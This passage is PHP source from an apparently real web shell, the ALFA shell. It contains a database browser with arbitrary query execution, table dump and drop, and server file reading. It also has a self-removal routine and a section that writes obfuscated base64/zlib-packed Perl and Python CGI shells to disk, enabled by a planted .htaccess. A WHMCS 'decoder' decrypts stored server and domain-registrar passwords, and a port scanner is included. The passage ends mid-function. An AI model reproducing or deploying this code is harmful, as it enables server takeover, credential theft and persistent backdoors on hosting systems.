5763$tbls_res = $db->listTables();
5764while($item = $db->fetch($tbls_res)){
5765list($key, $value) = each($item);
5766if(!empty($_POST['sql_count']))
5767$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));
5768$value = htmlspecialchars($value);
5769echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a class='db-opt-id' href='javascript:void(0);' onclick=\"fs('0','".$value."',this)\"><span class='mysql_tables' style='font-weight:unset;'>".$value."</span></a>" . (empty($_POST['sql_count'])?' ':" <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</nobr><br>";
5770}
5771echo "<p><input type='checkbox' onclick='is();'> <input type='button' value=' Dump ' onclick=\"fs('4',null,this);\" class='button db-opt-id'> <input type='button' value=' Drop ! ' onclick=\"fs('5',null,this);\" class='button db-opt-id'></p><div class='txtfont'>File path:</div><input type='text' class='dumpfile-value db-opt-id' name='file' value='dump.sql'>".($dumpStatus?'<p><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'dump.sql\', \'download\')"><font color="#0F0">~ Download File ~</font></a></p>':'')."</td><td style='border-top:2px solid #666;'>";
5772if(@$_POST['alfa1'] == 'select'){
5773$_POST['alfa1'] = 'query';
5774$_POST['alfa3'] = $_POST['alfa3']?$_POST['alfa3']:1;
5775$db->query('SELECT COUNT(*) as n FROM `'.$_POST['alfa2'].'`');
5776$num = $db->fetch();
5777$pages = ceil($num['n'] / 30);
5778echo "<span>".$_POST['alfa2']."</span> ({$num['n']} records) Page # <input type=text name='alfa3' value=" . ((int)$_POST['alfa3']) . ">";
5779echo " of $pages";
5780if($_POST['alfa3'] > 1)
5781echo " <a href='javascript:void(0);' class='db-opt-id' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']-1)."\"]',this)>< Prev</a>";
5782if($_POST['alfa3'] < $pages)
5783echo " <a href='javascript:void(0);' class='db-opt-id' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']+1)."\"]',this)>Next ></a>";
5784$_POST['alfa3']--;
5785$cache_table = $_POST['alfa2'];
5786if($_POST['type']=='pgsql')
5787$_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT 30 OFFSET '.($_POST['alfa3']*30);
5788else
5789$_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT '.($_POST['alfa3']*30).',30';
5790echo "<br><br>";
5791}
5792if((@$_POST['alfa1'] == 'query') && !empty($_POST['alfa2'])) {
5793$prikey = $db->fetch($db->query("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($_POST['sql_base'])."' AND TABLE_NAME = '".@addslashes($cache_table)."' AND COLUMN_KEY = 'PRI'"));
5794$db->query(@$_POST['alfa2']);
5795if($db->res !== false){
5796$title = false;
5797echo '<table width="100%" cellspacing="1" cellpadding="2" class="main" style="background-color:#292929" border="1">';
5798$line = 1;
5799while($item = $db->fetch()) {
5800if(!$title){
5801echo '<tr><th>#</th>';
5802foreach($item as $key => $value){
5803echo '<th>'.$key.'</th>';
5804}
5805reset($item);
5806$title=true;
5807echo '</tr><tr>';
5808$line = 2;
5809}
5810if($cache_table!=''){
5811 $cacheMsg = '<a class="db-opt-id" href="javascript:void(0);" onclick="fs(\'2\',\'["'.$cache_table.'","'.(!$prikey['COLUMN_NAME']?0:$prikey['COLUMN_NAME']).'","'.__ZW5jb2Rlcg(json_encode((!$prikey['COLUMN_NAME']?$item:$item[$prikey['COLUMN_NAME']]))).'"]\', this)">Edit</a>';
5812}else{
5813 $cacheMsg ='-';
5814}
5815echo '<tr class="l'.$line.'"><td>'.$cacheMsg.'</td>';
5816$line = $line==1?2:1;
5817foreach($item as $key => $value){
5818if($value == null)
5819echo '<td><i>null</i></td>';
5820else
5821echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
5822}
5823echo '</tr>';
5824}
5825echo '</table>';
5826} else {
5827echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
5828}
5829}
5830echo('</form>');
5831if((@$_POST['alfa1'] == 'edit') && !empty($_POST['alfa2'])){
5832$data = explode(':',$_POST['alfa3']);
5833echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data[0].'</font></p>');
5834echo("<form class='db-opt-id' act='update' onsubmit='fsu(this);return false;'><table border='1'>");
5835if($data[1] != '0'){
5836$data[2] = __ZGVjb2Rlcg($data[2]);
5837$data[2] = str_replace('"','',$data[2]);
5838$fetch = $db->fetch($db->query("SELECT * FROM `".$data[0]."` WHERE `".$data[1]."` = '".$data[2]."'"));
5839$fetch['__ALFAKEY'] = $data[1];
5840$fetch['__ALFAKEYVAL'] = $data[2];
5841}else{
5842$d = __ZGVjb2Rlcg($data[2]);
5843$fetch = json_decode($d, true);
5844}
5845foreach($fetch as $key => $value){
5846if($key=='__ALFAKEY'||$key=='__ALFAKEYVAL')continue;
5847$value = htmlspecialchars($value);
5848echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
5849}
5850echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode(($data[1] != '0'?array('__ALFAKEY'=>$data[1],'__ALFAKEYVAL'=>$data[2]):$fetch)))."'><input type='hidden' name='__ALFATBL' value='{$data[0]}'><input type='submit' value=' '></form>");
5851}
5852if((@$_POST['alfa1'] == 'update') && !empty($_POST['alfa2'])){
5853$data = json_decode($_POST['alfa2'], true);
5854$alfadata = $data['__ALFADATA'];
5855$data2 = json_decode(__ZGVjb2Rlcg($alfadata), true);
5856$keyval = array();
5857echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data['__ALFATBL'].'</font></p>');
5858echo("<form class='db-opt-id' act='update' onsubmit='fsu(this);return false;'><table border='1'>");
5859$set = '';
5860foreach($data as $key => $value){
5861if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
5862if($data2['__ALFAKEY']==$key){
5863$keyval['__ALFAKEY'] = $key;
5864$keyval['__ALFAKEYVAL'] = $value;
5865}
5866$set .= "`$key` = '".addslashes($value)."',";
5867$value = htmlspecialchars($value);
5868echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
5869}
5870unset($data['__ALFADATA']);
5871
5872echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode((isset($data2['__ALFAKEY'])?array('__ALFAKEY'=>$keyval['__ALFAKEY'],'__ALFAKEYVAL'=>$keyval['__ALFAKEYVAL']):$data)))."'><input type='hidden' name='__ALFATBL' value='{$data['__ALFATBL']}'><input type='submit' value=' '></form>");
5873
5874if(!isset($data2['__ALFAKEY'])){
5875$where = '';
5876foreach($data2 as $key => $value){
5877if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
5878$value = addslashes($value);
5879$where .= "`$key` = '$value' AND ";
5880}
5881$where = substr($where, 0, -4);
5882}else{
5883$where = "`{$data2['__ALFAKEY']}` = '".addslashes($data2['__ALFAKEYVAL'])."'";
5884}
5885$set = substr($set, 0, -1);
5886$db->fetch($db->query("UPDATE `{$data['__ALFATBL']}` SET $set WHERE $where"));
5887if($db->error())
5888echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
5889else echo("Success...!");
5890}
5891if($_POST['alfa1']!='edit'&&$_POST['alfa1']!='update'){
5892echo "<p>Query:</p><form class='db-opt-id' onsubmit='fs(this, null, this);return false;'>
5893<input type='hidden' name='alfa1' value='query'/>
5894<textarea name='query' style='width:100%;height:100px'>";
5895echo $_POST['alfa1']!='loadfile'?htmlspecialchars($_POST['alfa2']):'';
5896echo "</textarea><p><div style='float:left;'><input type=submit value=' '></div></p></form>";
5897}
5898echo "</td></tr>";
5899}
5900echo "</table></form><br/>";
5901if($_POST['type']=='mysql') {
5902$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
5903if($db->fetch())
5904echo "<form class='db-opt-id' onsubmit=\"fs('3',this.f.value,this);return false;\"><div class='txtfont'>Load file:</div> <input class='toolsInp' type='text' name='f'> <input type='submit' value=' '></form>";
5905}
5906if(@$_POST['alfa1'] == 'loadfile'){
5907$file = $db->loadFile($_POST['alfa2']);
5908echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
5909}
5910}else{
5911echo htmlspecialchars($db->error());
5912}
5913echo '</div>';
5914alfafooter();
5915}
5916function alfaselfrm(){
5917if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){
5918echo(__pre().'<center>');
5919if(@unlink($GLOBALS['__file_path'])){
5920echo('<b>Shell has been removed</i> :)</b>');
5921}else{
5922echo 'unlink error!';
5923}
5924echo('</center>');
5925}
5926if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){
5927echo "<div class=header>";
5928echo "
5929<center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
5930echo '<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g(\'selfrm\',null,\'yes\');"> Yes</a>';
5931echo '</p></center></div>';
5932}
5933}
5934function alfacgishell(){
5935alfahead();
5936$div = "";
5937if(!in_array($_POST['alfa1'],array('perl','py'))){
5938$div = "</div>";
5939echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick="runcgi(\'perl\')">| Perl | </a><a href=javascript:void(0) onclick="runcgi(\'py\');">| Python | </a>';
5940}
5941if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){
5942@mkdir('cgialfa',0755);
5943@chdir('cgialfa');
5944alfacgihtaccess('cgi');
5945$name = $_POST['alfa1'].'.alfa';
5946$perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';;
5947$py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
5948if($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;}
5949if(__write_file($name,$code)){
5950@chmod($name,0755);
5951echo '<iframe src="'.'cgialfa/'.$name.'" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
5952}
5953}
5954echo $div;
5955alfafooter();
5956}
5957function alfaWhmcs(){
5958alfahead();
5959echo '<div class=header>';
5960function decrypt($string,$cc_encryption_hash){
5961$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
5962$hash_key = _hash($key);
5963$hash_length = strlen ($hash_key);
5964$string = __ZGVjb2Rlcg($string);
5965$tmp_iv = substr ($string, 0, $hash_length);
5966$string = substr ($string, $hash_length, strlen ($string) - $hash_length);
5967$iv = $out = '';
5968$c = 0;
5969while ($c < $hash_length)
5970{
5971$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
5972++$c;
5973}
5974$key = $iv;
5975$c = 0;
5976while ($c < strlen ($string))
5977{
5978if (($c != 0 AND $c % $hash_length == 0))
5979{
5980$key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
5981}
5982$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
5983++$c;
5984}
5985return $out;
5986}
5987function _hash($string)
5988{
5989if(function_exists('sha1'))
5990{
5991$hash = sha1 ($string);
5992}
5993else
5994{
5995$hash = md5 ($string);
5996}
5997$out = '';
5998$c = 0;
5999while ($c < strlen ($hash))
6000{
6001$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
6002$c += 2;
6003}
6004return $out;
6005}
6006AlfaNum(8,9,10);
6007echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>".getConfigHtml('whmcs')."</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">
6008<input type='hidden' name='form_action' value='2'>";
6009$table = array('td1' =>
6010 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
6011 'td2' =>
6012 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
6013 'td3' =>
6014 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
6015 'td4' =>
6016 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
6017 'td5' =>
6018 array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50')
6019);
6020create_table($table);
6021echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
6022if($_POST['alfa5']!=''){
6023$db_host=($_POST['alfa7']);
6024$db_username=($_POST['alfa3']);
6025$db_password=($_POST['alfa4']);
6026$db_name=($_POST['alfa5']);
6027$cc_encryption_hash=($_POST['alfa6']);
6028echo __pre();
6029$conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));
6030$query = mysqli_query($conn,"SELECT * FROM tblservers");
6031$num = mysqli_num_rows($query);
6032if ($num > 0){
6033for($i=0; $i <=$num-1; $i++){
6034$v = @mysqli_fetch_array($query);
6035$ipaddress = $v['ipaddress'];
6036$username = $v['username'];
6037$type = $v['type'];
6038$active = $v['active'];
6039$hostname = $v['hostname'];
6040echo("<center><table border='1'>");
6041$password = decrypt ($v['password'], $cc_encryption_hash);
6042echo("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
6043echo("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
6044echo("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
6045echo("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
6046echo("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
6047echo("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
6048echo "</table><br><br></center>";
6049}
6050$query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");
6051$num1 = @mysqli_num_rows($query1);
6052if ($num1 > 0){
6053for($i=0; $i <=$num1 -1; $i++){
6054$v = mysqli_fetch_array($query1);
6055$registrar = $v['registrar'];
6056$setting = $v['setting'];
6057$value = decrypt($v['value'], $cc_encryption_hash);
6058if ($value==""){
6059$value=0;
6060}
6061echo("<center>Domain Reseller <br><center>");
6062echo("<center><table border='1'>");
6063echo("<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>$registrar</td></tr></b>");
6064echo("<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>$setting</td></tr></b>");
6065echo("<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>$value</td></tr></b>");
6066echo "</table><br><br></center>";
6067}
6068}
6069}else{__alert('<font color="red">tblservers is Empty...!</font>');};
6070}
6071echo "</div>";
6072alfafooter();
6073}
6074function alfaportscanner(){
6075alfahead();
6076echo '<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
6077<form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value); return false;">
6078<input type="hidden" name="y" value="phptools">
6079<div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
6080<div class="txtfont">Port start: </div> <input id="text" size="5" type="text" name="start" value="80"/>
6081<div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
6082</form></center><br>';
6083$start = strip_tags($_POST['alfa2']);
6084$end = strip_tags($_POST['alfa3']);
6085$host = strip_tags($_POST['alfa4']);
6086if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){
6087echo __pre();
6088$packetContent = "GET / HTTP/1.1\r\n\r\n";
6089if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);
6090else{
6091$packetContent = str_replace(array("\r","\n"), "", $packetContent);
6092$packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent);
6093}
6094for($i = $start; $i<=$end; $i++){
6095$sock = @fsockopen($host, $i, $errno, $errstr, 3);
6096if($sock){
6097stream_set_timeout($sock, 5);
6098fwrite($sock, $packetContent."\r\n\r\n\x00");
6099$counter = 0;
6100$maxtry = 1;
6101$bin = "";
6102do{
6103$line = fgets($sock, 1024);
6104if(trim($line)=="")$counter++;
6105$bin .= $line;
6106}while($counter<$maxtry);
6107fclose($sock);
6108echo "<center><p>Port <font style='color:#DE3E3E'>$i</font> is open</p>";
6109echo "<p><textarea style='height:140px;width:50%;'>".$bin."</textarea></p></center>";
6110}
6111flush();
6112}
6113}
6114echo '</div>';
6115alfafooter();
6116}
6117function alfacgihtaccess($m,$d='', $symname=false){
6118$readme = "";
6119if($symname){$readme="\nReadmeName ".trim($symname);}
6120if($m=='cgi'){
6121$code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
6122}elseif($m=='sym'){
